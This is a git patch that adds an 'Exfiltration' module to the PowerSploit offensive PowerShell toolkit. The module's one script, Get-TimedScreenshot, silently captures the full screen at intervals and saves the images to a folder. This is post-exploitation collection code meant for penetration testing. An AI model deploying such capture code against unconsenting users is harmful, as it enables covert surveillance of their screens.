From b3bbe03e939f300c07169650b342e0665e578085 Mon Sep 17 00:00:00 2001 From: bitform Date: Sun, 20 Jan 2013 21:32:41 -0500 Subject: Added 'Exfiltration' Module --- Exfiltration/Exfiltration.psd1 | 87 +++++++++++++++++++++++++++++++ Exfiltration/Exfiltration.psm1 | 1 + Exfiltration/Get-TimedScreenshot.ps1 | 99 ++++++++++++++++++++++++++++++++++++ Exfiltration/Usage.md | 12 +++++ 4 files changed, 199 insertions(+) create mode 100644 Exfiltration/Exfiltration.psd1 create mode 100644 Exfiltration/Exfiltration.psm1 create mode 100644 Exfiltration/Get-TimedScreenshot.ps1 create mode 100644 Exfiltration/Usage.md (limited to 'Exfiltration') diff --git a/Exfiltration/Exfiltration.psd1 b/Exfiltration/Exfiltration.psd1 new file mode 100644 index 0000000..7eb9aa2 --- /dev/null +++ b/Exfiltration/Exfiltration.psd1 @@ -0,0 +1,87 @@ +@{ + +# Script module or binary module file associated with this manifest. +ModuleToProcess = 'Exfiltration.psm1' + +# Version number of this module. +ModuleVersion = '1.0.0.0' + +# ID used to uniquely identify this module +GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a' + +# Author of this module +Author = 'Matthew Graeber' + +# Company or vendor of this module +CompanyName = '' + +# Copyright statement for this module +Copyright = 'BSD 3-Clause' + +# Description of the functionality provided by this module +Description = 'PowerSploit Exfiltration Module' + +# Minimum version of the Windows PowerShell engine required by this module +PowerShellVersion = '2.0' + +# Name of the Windows PowerShell host required by this module +# PowerShellHostName = '' + +# Minimum version of the Windows PowerShell host required by this module +# PowerShellHostVersion = '' + +# Minimum version of the .NET Framework required by this module +# DotNetFrameworkVersion = '' + +# Minimum version of the common language runtime (CLR) required by this module +# CLRVersion = '' + +# Processor architecture (None, X86, Amd64) required by this module +# ProcessorArchitecture = '' + +# Modules that must be imported into the global environment prior to importing this module +# RequiredModules = @() + +# Assemblies that must be loaded prior to importing this module +# RequiredAssemblies = @() + +# Script files (.ps1) that are run in the caller's environment prior to importing this module. +# ScriptsToProcess = '' + +# Type files (.ps1xml) to be loaded when importing this module +# TypesToProcess = @() + +# Format files (.ps1xml) to be loaded when importing this module +# FormatsToProcess = @() + +# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess +# NestedModules = @() + +# Functions to export from this module +FunctionsToExport = '*' + +# Cmdlets to export from this module +CmdletsToExport = '*' + +# Variables to export from this module +VariablesToExport = '' + +# Aliases to export from this module +AliasesToExport = '' + +# List of all modules packaged with this module. +ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'}) + +# List of all files packaged with this module +FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Usage.md' + +# Private data to pass to the module specified in RootModule/ModuleToProcess +# PrivateData = '' + +# HelpInfo URI of this module +# HelpInfoURI = '' + +# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. +# DefaultCommandPrefix = '' + +} \ No newline at end of file diff --git a/Exfiltration/Exfiltration.psm1 b/Exfiltration/Exfiltration.psm1 new file mode 100644 index 0000000..e5234fb --- /dev/null +++ b/Exfiltration/Exfiltration.psm1 @@ -0,0 +1 @@ +Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} \ No newline at end of file diff --git a/Exfiltration/Get-TimedScreenshot.ps1 b/Exfiltration/Get-TimedScreenshot.ps1 new file mode 100644 index 0000000..3a19a7d --- /dev/null +++ b/Exfiltration/Get-TimedScreenshot.ps1 @@ -0,0 +1,99 @@ +Function Get-TimedScreenshot { +<# +.SYNOPSIS + + Get-TimedScreenshot + + Author: Chris Campbell (@obscuresec) + License: BSD 3-Clause + +.DESCRIPTION + + A function that takes screenshots and saves them to a folder. + +.PARAMETER $Path + + Specifies the folder path. + +.PARAMETER $Interval + + Specifies the interval in seconds between taking screenshots. + +.PARAMETER $EndTime + + Specifies when the script should stop running in the format HH-MM + +.EXAMPLE + + PS C:\> Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00 + +.LINK + + http://obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html + https://github.com/obscuresec/random/blob/master/Get-TimedScreenshot + +#> + + [CmdletBinding()] Param( + [Parameter(Mandatory=$True)] + [ValidateScript({Test-Path -Path $_ })] + [string] $Path, + + [Parameter(Mandatory=$True)] + [int32] $Interval, + + [Parameter(Mandatory=$True)] + [string] $EndTime + ) + + #Define helper function that generates and saves screenshot + Function GenScreenshot { + $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen + $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height + $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject) + $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size) + $DrawingGraphics.Dispose() + $ScreenshotObject.Save($FilePath) + $ScreenshotObject.Dispose() + } + + Try { + + #load required assembly + Add-Type -Assembly System.Windows.Forms + + Do { + #get the current time and build the filename from it + $Time = (Get-Date) + + [string] $FileName = "$($Time.Month)" + $FileName += '-' + $FileName += "$($Time.Day)" + $FileName += '-' + $FileName += "$($Time.Year)" + $FileName += '-' + $FileName += "$($Time.Hour)" + $FileName += '-' + $FileName += "$($Time.Minute)" + $FileName += '-' + $FileName += "$($Time.Second)" + $FileName += '.png' + + #use join-path to add path to filename + [string] $FilePath = (Join-Path $Path $FileName) + + #run screenshot function + GenScreenshot + + Write-Verbose "Saved screenshot to $FilePath. Sleeping for $Interval seconds" + + Start-Sleep -Seconds $Interval + } + + #note that this will run once regardless if the specified time as passed + While ((Get-Date -Format HH:%m) -lt $EndTime) + } + + Catch {Write-Warning "$Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage"} + +} \ No newline at end of file diff --git a/Exfiltration/Usage.md b/Exfiltration/Usage.md new file mode 100644 index 0000000..dfdaabb --- /dev/null +++ b/Exfiltration/Usage.md @@ -0,0 +1,12 @@ +To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. + +The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" +The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" + +To use the module, type `Import-Module Exfiltration` + +To see the commands imported, type `Get-Command -Module Exfiltration` + +For help on each individual command, Get-Help is your friend. + +Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. \ No newline at end of file -- cgit v1.2.3